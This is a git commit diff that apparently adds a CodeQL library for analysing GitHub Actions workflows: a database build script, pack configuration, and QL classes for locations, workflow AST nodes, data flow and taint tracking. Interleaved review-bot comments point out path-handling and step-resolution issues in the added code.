ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 create mode 100644 
ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode create mode 100644 
ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode#0#e create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/02.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/04.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/29.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/46.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/91.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/95.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack.d create mode 100644 
ql/src/test-db/db-yaml/default/cache/pages/a4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ab.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ce.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/fc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/01.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/03.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/06.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/09.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/20.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/24.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/25.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/26.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2e.pack create mode 100644 
ql/src/test-db/db-yaml/default/cache/predicates/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/36.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/3c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/43.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/45.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/57.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/60.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/66.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/74.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/75.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/78.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/83.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/86.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/8d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/96.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/98.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/99.pack create mode 100644 
ql/src/test-db/db-yaml/default/cache/predicates/9f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bf.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d2.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/dc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ef.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ff.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/07.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/14.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/18.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/19.pack 
create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/39.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/47.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/4d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/52.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/56.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/6a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/80.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/85.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/8b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/aa.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ac.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/c1.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/cc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/da.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/version create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel.checksum create 
mode 100644 ql/src/test-db/db-yaml/default/files.rel create mode 100644 ql/src/test-db/db-yaml/default/files.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/folders.rel create mode 100644 ql/src/test-db/db-yaml/default/folders.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/poolInfo create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 
ql/src/test-db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 ql/src/test-db/db-yaml/yaml.dbscheme create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091753.298Z.json create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091754.191Z.json create mode 100644 ql/src/test-db/log/database-create-20240203.101751.644.log create mode 100644 ql/src/test-db/log/database-index-files-20240203.101752.962.log create mode 100644 ql/src/test-db/src.zip create mode 100644 ql/src/test/changed-files.yml create mode 100644 ql/src/test/inter1.yml create mode 100644 ql/src/test/no-flow1.yml create mode 100644 ql/src/test/no-flow2.yml create mode 100644 ql/src/test/simple1.yml create mode 100644 ql/src/test/simple2.yml create mode 100644 ql/src/test/test.ql create mode 100644 ql/src/test/test.yml diff --git a/build-dbs.sh b/build-dbs.sh new file mode 100755 index 00000000000..dac4753f4d6 --- /dev/null +++ b/build-dbs.sh @@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf ql/src/test-db || true +rm -rf ql/lib/test-db || true +codeql database create ql/src/test-db -l yaml -s ql/src/test +codeql database create ql/lib/test-db -l yaml -s ql/lib/test diff --git a/codeql-workspace.yml b/codeql-workspace.yml new file mode 100644 index 00000000000..ad62591967d --- /dev/null +++ b/codeql-workspace.yml @@ -0,0 +1,3 @@ +provide: + - "**/ql/src/qlpack.yml" + - "**/ql/lib/qlpack.yml" \ No newline at end of file diff --git a/ql/lib/actions.qll b/ql/lib/actions.qll new file mode 100644 index 00000000000..2c1d1cee925 --- /dev/null 
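Review bot: build-dbs.sh removes and recreates `ql/src/test-db` and `ql/lib/test-db` through paths relative to the caller's working directory, and it keeps going if the first `codeql database create` fails. Adding `set -euo pipefail` and `cd "$(dirname "$0")"` right after the shebang would pin the `rm -rf` targets to the repository and stop on the first error; `rm -rf` already ignores missing paths, so the `|| true` can go. The file list of this commit also adds the generated databases themselves (cache packs, `ql/src/test-db/log/*.log`, `src.zip`); since this script rebuilds them, listing both `test-db` directories in `.gitignore` would keep build logs, which may record local paths, out of the history.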
+++ b/ql/lib/actions.qll @@ -0,0 +1 @@ +import codeql.actions.Ast diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml new file mode 100644 index 00000000000..56f10b81e0c --- /dev/null +++ b/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.7 + codeql/dataflow: + version: 0.1.7 + codeql/ssa: + version: 0.2.7 + codeql/typetracking: + version: 0.2.7 + codeql/util: + version: 0.2.7 + codeql/yaml: + version: 0.2.7 +compiled: false diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll new file mode 100644 index 00000000000..3a16bdec40d --- /dev/null +++ b/ql/lib/codeql/Locations.qll 
@@ -0,0 +1,71 @@ +/** Provides classes for working with locations. */ + +import files.FileSystem + +bindingset[loc] +pragma[inline_late] +private string locationToString(Location loc) { + exists(string filepath, int startline, int startcolumn, int endline, int endcolumn | + loc.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and + result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn + ) +} + +/** + * A location as given by a file, a start line, a start column, + * an end line, and an end column. + * + * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +class Location extends @location_default { + /** Gets the file for this location. */ + File getFile() { locations_default(this, result, _, _, _, _) } + + /** Gets the 1-based line number (inclusive) where this location starts. */ + int getStartLine() { locations_default(this, _, result, _, _, _) } + + /** Gets the 1-based column number (inclusive) where this location starts. */ + int getStartColumn() { locations_default(this, _, _, result, _, _) } + + /** Gets the 1-based line number (inclusive) where this location ends. */ + int getEndLine() { locations_default(this, _, _, _, result, _) } + + /** Gets the 1-based column number (inclusive) where this location ends. */ + int getEndColumn() { locations_default(this, _, _, _, _, result) } + + /** Gets the number of lines covered by this location. */ + int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + + /** Gets a textual representation of this element. */ + pragma[inline] + string toString() { result = locationToString(this) } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. 
+ * For more information, see + * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + exists(File f | + locations_default(this, f, startline, startcolumn, endline, endcolumn) and + filepath = f.getAbsolutePath() + ) + } + + /** Holds if this location starts strictly before the specified location. */ + pragma[inline] + predicate strictlyBefore(Location other) { + this.getStartLine() < other.getStartLine() + or + this.getStartLine() = other.getStartLine() and this.getStartColumn() < other.getStartColumn() + } +} + +/** An entity representing an empty location. */ +class EmptyLocation extends Location { + EmptyLocation() { this.hasLocationInfo("", 0, 0, 0, 0) } +} diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll new file mode 100644 index 00000000000..967a969a6b7 --- /dev/null +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -0,0 +1,256 @@ +private import codeql.actions.ast.internal.Actions +private import codeql.Locations + +class AstNode instanceof YamlNode { + AstNode getParentNode() { + if exists(YamlMapping m | m.maps(_, this)) + then exists(YamlMapping m | m.maps(result, this)) + else result = super.getParentNode() + } + + AstNode getAChildNode() { + if this instanceof YamlMapping + then this.(YamlMapping).maps(result, _) + else + if this instanceof YamlCollection + then result = super.getChildNode(_) + else + if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) + then exists(YamlMapping m | m.maps(this, result)) + else none() + } + + AstNode getChildNodeByOrder(int i) { + result = + rank[i](Expression child, Location l | + child = this.getAChildNode() and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } + + string toString() { result = super.toString() } + + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + + Location getLocation() { result = super.getLocation() } +} + +class Statement extends AstNode { + // narrow down to something that is a statement + // A statement is a group of expressions and/or statements that you design to carry out a task or an action. + // Any statement that can return a value is automatically qualified to be used as an expression. +} + +class Expression extends Statement { + // narrow down to something that is an expression + // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. +} + +/** + * A Job is a collection of steps that run in an execution environment. + */ +class JobStmt extends Statement instanceof Actions::Job { + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. 
+ */ + string getId() { result = super.getId() } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + /** Gets the step at the given index within this job. */ + StepStmt getStep(int index) { result = super.getStep(index) } + + /** Gets any steps that are defined within this job. */ + StepStmt getAStep() { result = super.getStep(_) } + + JobStmt getNeededJob() { + exists(Actions::Needs needs | + needs.getJob() = this and + result = needs.getANeededJob().(JobStmt) + ) + } + + Expression getJobOutputExpr(string varName) { + this.(Actions::Job) + .lookup("outputs") + .(YamlMapping) + .maps(any(YamlScalar a | a.getValue() = varName), result) + } + + JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + Statement getSuccNode(int i) { + result = + rank[i](Expression child, Location l | + (child = this.getAStep() or child = this.getJobOutputStmt()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +class JobOutputStmt extends Statement instanceof YamlMapping { + JobStmt job; + + JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } + + StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) } +} + +/** + * A Step is a single task that can be executed as part of a job. + */ +class StepStmt extends Statement instanceof Actions::Step { + string getId() { result = super.getId() } + + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + JobStmt getJob() { result = super.getJob() } + + abstract AstNode getSuccNode(int i); +} + +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. 
+ */ +class UsesExpr extends StepStmt, Expression { + Actions::Uses uses; + + UsesExpr() { uses.getStep() = this } + + string getTarget() { result = uses.getGitHubRepository() } + + string getVersion() { result = uses.getVersion() } + + Expression getArgument(string key) { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(key) + ) + } + + Expression getArgumentByOrder(int i) { + exists(Actions::With with | + with.getStep() = uses.getStep() and + result = + rank[i](Expression child, Location l | + child = with.lookup(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + ) + } + + Expression getAnArgument() { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(_) + ) + } + + override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) } +} + +/** + * An argument passed to a UsesExpr. + */ +class ArgumentExpr extends Expression { + UsesExpr uses; + + ArgumentExpr() { this = uses.getAnArgument() } +} + +/** + * A Run step represents a call to an inline script or executable on the runner machine. + */ +class RunExpr extends StepStmt { + Actions::Run scriptExpr; + + RunExpr() { scriptExpr.getStep() = this } + + Expression getScriptExpr() { result = scriptExpr } + + string getScript() { result = scriptExpr.getValue() } + + override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 } +} + +/** + * A YAML string containing a workflow expression. + */ +class ExprAccessExpr extends Expression instanceof YamlString { + string expr; + + ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } + + string getExpression() { result = expr } + + JobStmt getJob() { result.getAChildNode*() = this } +} + +/** + * A ExprAccessExpr where the expression references a step output. 
+ * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepOutputAccessExpr extends ExprAccessExpr { + string stepId; + string varName; + + StepOutputAccessExpr() { + stepId = + this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getStepId() { result = stepId } + + string getVarName() { result = varName } + + StepStmt getStep() { result.getId() = stepId } +} + +/** + * A ExprAccessExpr where the expression references a job output. + * eg: `${{ needs.job1.outputs.foo}}` + */ +class JobOutputAccessExpr extends ExprAccessExpr { + string jobId; + string varName; + + JobOutputAccessExpr() { + jobId = + this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getVarName() { result = varName } + + Expression getOutputExpr() { + exists(JobStmt job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getJobOutputExpr(varName) = result + ) + } +} diff --git a/ql/lib/codeql/actions/Cfg.qll b/ql/lib/codeql/actions/Cfg.qll new file mode 100644 index 00000000000..df7acf4e1c0 --- /dev/null +++ b/ql/lib/codeql/actions/Cfg.qll @@ -0,0 +1,7 @@ +/** Provides classes representing the control flow graph. */ + +private import codeql.actions.controlflow.internal.Cfg as CfgInternal +import CfgInternal::Completion +import CfgInternal::CfgScope +import CfgInternal::CfgImpl + diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll new file mode 100644 index 00000000000..d1e714e8fbc --- /dev/null +++ b/ql/lib/codeql/actions/DataFlow.qll 
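Review bot: `StepOutputAccessExpr.getStep()` resolves the referenced step by id alone (`result.getId() = stepId`), so `steps.foo.outputs.x` binds to every step with id `foo` in any job of any extracted workflow file. Step ids are only meaningful inside one job, and `JobOutputAccessExpr.getOutputExpr()` in the same hunk already restricts its lookup to the same file; without a similar restriction, data flow built on `getStep()` can report flows between unrelated workflows. Constraining it to the enclosing job, e.g. `StepStmt getStep() { result.getId() = stepId and result.getJob() = this.getJob() }`, keeps the resolution local for workflow jobs (steps of a composite action have no job and would need their own case). Separately, `JobStmt.getName()` and `StepStmt.getName()` return `super.getId()`, although the doc comment on `JobStmt.getName()` promises the human-readable name.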
@@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) data flow analyses. + */ +module DataFlow { + private import codeql.dataflow.DataFlow + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + import DataFlowMake + import codeql.actions.dataflow.internal.DataFlowPublic +} diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll new file mode 100644 index 00000000000..16d5d826aa8 --- /dev/null +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ +module TaintTracking { + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + private import codeql.dataflow.TaintTracking + import TaintFlowMake +} diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll new file mode 100644 index 00000000000..e3be61fd3b9 --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll 
